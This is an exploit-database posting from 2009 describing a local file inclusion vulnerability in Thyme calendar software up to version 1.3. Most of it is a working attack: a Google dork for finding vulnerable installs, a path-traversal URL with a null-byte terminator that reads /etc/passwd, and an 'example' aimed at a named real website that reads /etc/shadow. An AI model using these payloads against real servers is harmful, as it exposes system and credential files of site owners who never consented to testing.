[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Thyme <= 1.3 (export_to) Local File Inclusion Vulnerability
# Published : 2009-02-10
# Author : cheverok
# Previous Title : InselPhoto 1.1 (query) Remote SQL Injection Exploit
# Next Title : Papoo CMS 3.x (pfadhier) Local File Inclusion Vulnerability


[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
 | Theme Local File Inclusion / (Register_globals: off) |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
 | Version: <= 1.3 |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
 | Dork: Thyme 1. ?? 2006 eXtrovert Software LLC. All rights reserved |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
 | Founded by: cheverok[at]gmail.com |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]

--------------------------------------------------------------------------------------
  Intro:

See info

  http://host/patch/phpinfo.php
   
   
if register_globals Off, then

---------------------------------------------------------------------------------------
  Exploit:
   
  http://host/patch/modules/sync/export.php?export_to=../../../../../../../../../../../etc/passwd%00


---------------------------------------------------------------------------------------
  Example:


  http://www.cbpool.org/thyme/modules/sync/export.php?export_to=../../../../../../../../../../../etc/shadow%00

----------------------------------------------------------------------------------------
(c) cheverok, 10.2.2009 greetz to antichat  

# www.Syue.com [2009-02-10]